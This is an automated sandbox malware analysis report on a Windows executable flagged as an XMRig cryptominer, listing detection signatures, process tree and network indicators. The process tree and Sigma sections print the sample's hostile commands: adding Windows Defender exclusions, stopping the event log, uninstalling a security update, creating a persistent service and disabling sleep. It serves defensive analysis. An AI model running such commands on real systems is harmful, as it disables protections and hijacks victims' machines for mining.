Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
12Jh49DCAj.exe

Overview

General Information

Sample name:12Jh49DCAj.exe
renamed because original name is a hash value
Original sample name:003342f9137c04ac86b94e7798a9b0ebe7cff13524bb191f7ac2472a059b442d.exe
Analysis ID:1546361
MD5:a44c57ded5f0e75dd398f8bde8c83219
SHA1:b46a7f6d001c9e06b7dcc39a926130fb791f4663
SHA256:003342f9137c04ac86b94e7798a9b0ebe7cff13524bb191f7ac2472a059b442d
Tags:exeuser-Chainskilabs
Infos:

Detection

Xmrig
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Disable power options
Sigma detected: Stop EventLog
System process connects to network (likely due to code injection or exploit)
Yara detected Xmrig cryptocurrency miner
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
DNS related to crypt mining pools
Injects code into the Windows Explorer (explorer.exe)
Loading BitLocker PowerShell Module
Modifies power options to not sleep / hibernate
Modifies the context of a thread in another process (thread injection)
Query firmware table information (likely to detect VMs)
Sample is not signed and drops a device driver
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses powercfg.exe to modify the power settings
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Powershell Defender Exclusion
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • 12Jh49DCAj.exe (PID: 3544 cmdline: "C:\Users\user\Desktop\12Jh49DCAj.exe" MD5: A44C57DED5F0E75DD398F8BDE8C83219)
    • powershell.exe (PID: 2020 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 4896 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 6512 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6044 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wusa.exe (PID: 3520 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)
    • powercfg.exe (PID: 2404 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 3560 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 3620 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 5944 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 5920 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 5544 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 5896 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 6996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 6664 cmdline: C:\Windows\system32\sc.exe delete "ODTUTVYC" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6468 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 6008 cmdline: C:\Windows\system32\sc.exe create "ODTUTVYC" binpath= "C:\ProgramData\obuuzbczoxdo\jjlazghkkuth.exe" start= "auto" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3224 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 3108 cmdline: C:\Windows\system32\sc.exe stop eventlog MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 280 cmdline: C:\Windows\system32\sc.exe start "ODTUTVYC" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1336 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • jjlazghkkuth.exe (PID: 1600 cmdline: C:\ProgramData\obuuzbczoxdo\jjlazghkkuth.exe MD5: A44C57DED5F0E75DD398F8BDE8C83219)
    • powershell.exe (PID: 1444 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7020 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6072 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wusa.exe (PID: 1880 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)
    • powercfg.exe (PID: 2052 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 5128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 6460 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 3432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 6468 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 5944 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 3260 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 6512 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • conhost.exe (PID: 1132 cmdline: C:\Windows\system32\conhost.exe MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • explorer.exe (PID: 3384 cmdline: explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)
  • svchost.exe (PID: 5996 cmdline: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
xmrigAccording to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000026.00000002.4573167286.000000000100C000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
    00000026.00000002.4573167286.0000000000F50000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
      00000026.00000002.4573167286.0000000000F90000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
        00000026.00000002.4573167286.0000000000F75000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
          Process Memory Space: explorer.exe PID: 3384JoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security

            Sigma Signatures

            Change of critical system settings

            barindex
            Sigma detected: Disable power options
            Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine|base64offset|contains: , Image: C:\Windows\System32\powercfg.exe, NewProcessName: C:\Windows\System32\powercfg.exe, OriginalFileName: C:\Windows\System32\powercfg.exe, ParentCommandLine: "C:\Users\user\Desktop\12Jh49DCAj.exe", ParentImage: C:\Users\user\Desktop\12Jh49DCAj.exe, ParentProcessId: 3544, ParentProcessName: 12Jh49DCAj.exe, ProcessCommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, ProcessId: 2404, ProcessName: powercfg.exe

            System Summary

            barindex
            Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\12Jh49DCAj.exe", ParentImage: C:\Users\user\Desktop\12Jh49DCAj.exe, ParentProcessId: 3544, ParentProcessName: 12Jh49DCAj.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 2020, ProcessName: powershell.exe
            Sigma detected: Powershell Defender Exclusion
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\12Jh49DCAj.exe", ParentImage: C:\Users\user\Desktop\12Jh49DCAj.exe, ParentProcessId: 3544, ParentProcessName: 12Jh49DCAj.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 2020, ProcessName: powershell.exe
            Sigma detected: New Service Creation Using Sc.EXE
            Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: C:\Windows\system32\sc.exe create "ODTUTVYC" binpath= "C:\ProgramData\obuuzbczoxdo\jjlazghkkuth.exe" start= "auto", CommandLine: C:\Windows\system32\sc.exe create "ODTUTVYC" binpath= "C:\ProgramData\obuuzbczoxdo\jjlazghkkuth.exe" start= "auto", CommandLine|base64offset|contains: r, Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\Desktop\12Jh49DCAj.exe", ParentImage: C:\Users\user\Desktop\12Jh49DCAj.exe, ParentProcessId: 3544, ParentProcessName: 12Jh49DCAj.exe, ProcessCommandLine: C:\Windows\system32\sc.exe create "ODTUTVYC" binpath= "C:\ProgramData\obuuzbczoxdo\jjlazghkkuth.exe" start= "auto", ProcessId: 6008, ProcessName: sc.exe
            Sigma detected: Non Interactive PowerShell Process Spawned
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\12Jh49DCAj.exe", ParentImage: C:\Users\user\Desktop\12Jh49DCAj.exe, ParentProcessId: 3544, ParentProcessName: 12Jh49DCAj.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 2020, ProcessName: powershell.exe
            Sigma detected: Windows Processes Suspicious Parent Directory
            Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager, CommandLine: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager, ProcessId: 5996, ProcessName: svchost.exe

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Sigma detected: Stop EventLog
            Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\sc.exe stop eventlog, CommandLine: C:\Windows\system32\sc.exe stop eventlog, CommandLine|base64offset|contains: ), Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\Desktop\12Jh49DCAj.exe", ParentImage: C:\Users\user\Desktop\12Jh49DCAj.exe, ParentProcessId: 3544, ParentProcessName: 12Jh49DCAj.exe, ProcessCommandLine: C:\Windows\system32\sc.exe stop eventlog, ProcessId: 3108, ProcessName: sc.exe

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-31T20:11:20.574099+010020229301A Network Trojan was detected172.202.163.200443192.168.2.649746TCP
            2024-10-31T20:11:58.857779+010020229301A Network Trojan was detected172.202.163.200443192.168.2.649952TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Multi AV Scanner detection for dropped file
            Source: C:\ProgramData\obuuzbczoxdo\jjlazghkkuth.exeReversingLabs: Detection: 63%
            Multi AV Scanner detection for submitted file
            Source: 12Jh49DCAj.exeReversingLabs: Detection: 63%
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability

            Bitcoin Miner

            barindex
            Yara detected Xmrig cryptocurrency miner
            Source: Yara matchFile source: 00000026.00000002.4573167286.000000000100C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000026.00000002.4573167286.0000000000F50000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000026.00000002.4573167286.0000000000F90000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000026.00000002.4573167286.0000000000F75000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 3384, type: MEMORYSTR
            DNS related to crypt mining pools
            Source: unknownDNS query: name: xmr-eu1.nanopool.org
            Source: 12Jh49DCAj.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
            Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: jjlazghkkuth.exe, 00000018.00000003.2166278619.00000209695D0000.00000004.00000001.00020000.00000000.sdmp

            Networking

            barindex
            System process connects to network (likely due to code injection or exploit)
            Source: C:\Windows\explorer.exeNetwork Connect: 54.37.232.103 10343Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.6:49710 -> 54.37.232.103:10343
            Source: Joe Sandbox ViewIP Address: 54.37.232.103 54.37.232.103
            Source: Joe Sandbox ViewASN Name: OVHFR OVHFR
            Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 172.202.163.200:443 -> 192.168.2.6:49746
            Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 172.202.163.200:443 -> 192.168.2.6:49952
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficDNS traffic detected: DNS query: xmr-eu1.nanopool.org
            Source: explorer.exe, 00000026.00000002.4576398328.0000000001960000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000026.00000002.4573167286.0000000000F90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.cloudflare.com/origin_ca.crl
            Source: explorer.exe, 00000026.00000002.4573167286.0000000000F90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.cloudflare.com/origin_ca.crl0
            Source: explorer.exe, 00000026.00000002.4576398328.0000000001960000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.cloudflare.com/origin_ca.crlC
            Source: jjlazghkkuth.exe, 00000018.00000003.2166278619.00000209695D0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
            Source: jjlazghkkuth.exe, 00000018.00000003.2166278619.00000209695D0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/Root.crl0
            Source: jjlazghkkuth.exe, 00000018.00000003.2166278619.00000209695D0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/RootSignPartners.crl0
            Source: jjlazghkkuth.exe, 00000018.00000003.2166278619.00000209695D0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/primobject.crl0
            Source: explorer.exe, 00000026.00000002.4573167286.0000000000F90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.cloudflare.com/origin_ca
            Source: explorer.exe, 00000026.00000002.4576398328.0000000001960000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000026.00000002.4573167286.0000000000F90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.cloudflare.com/origin_ca0

            System Summary

            barindex
            Uses powercfg.exe to modify the power settings
            Source: C:\Users\user\Desktop\12Jh49DCAj.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
            Source: C:\Windows\explorer.exeProcess Stats: CPU usage > 49%
            Source: C:\Users\user\Desktop\12Jh49DCAj.exeCode function: 0_2_00007FF6C5321394 NtAddBootEntry,0_2_00007FF6C5321394
            Source: C:\ProgramData\obuuzbczoxdo\jjlazghkkuth.exeCode function: 24_2_00007FF759BF1394 NtCreateProcessEx,24_2_00007FF759BF1394
            Source: C:\Windows\System32\conhost.exeCode function: 36_2_0000000140001394 NtCreateMutant,36_2_0000000140001394
            Source: C:\ProgramData\obuuzbczoxdo\jjlazghkkuth.exeFile created: C:\Windows\TEMP\ovabrjmyzhdo.sysJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile deleted: C:\Windows\Temp\__PSScriptPolicyTest_0htk1wp1.uea.ps1
            Source: C:\Users\user\Desktop\12Jh49DCAj.exeCode function: 0_2_00007FF6C5323B500_2_00007FF6C5323B50
            Source: C:\ProgramData\obuuzbczoxdo\jjlazghkkuth.exeCode function: 24_2_00007FF759BF3B5024_2_00007FF759BF3B50
            Source: C:\Windows\System32\conhost.exeCode function: 36_2_000000014000315036_2_0000000140003150
            Source: C:\Windows\System32\conhost.exeCode function: 36_2_00000001400026E036_2_00000001400026E0
            Source: Joe Sandbox ViewDropped File: C:\Windows\Temp\ovabrjmyzhdo.sys 11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
            Source: C:\ProgramData\obuuzbczoxdo\jjlazghkkuth.exeCode function: String function: 00007FF759BF1394 appears 33 times
            Source: C:\Users\user\Desktop\12Jh49DCAj.exeCode function: String function: 00007FF6C5321394 appears 33 times
            Source: classification engineClassification label: mal100.spyw.evad.mine.winEXE@58/12@1/1
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6964:120:WilError_03
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:504:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6044:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6072:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4896:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6996:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5128:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6512:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5944:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3560:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5544:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3224:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1336:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3432:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5944:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6468:120:WilError_03
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tzt5kz4g.cir.ps1Jump to behavior
            Source: C:\ProgramData\obuuzbczoxdo\jjlazghkkuth.exeProcess created: C:\Windows\explorer.exe
            Source: C:\ProgramData\obuuzbczoxdo\jjlazghkkuth.exeProcess created: C:\Windows\explorer.exeJump to behavior
            Source: 12Jh49DCAj.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
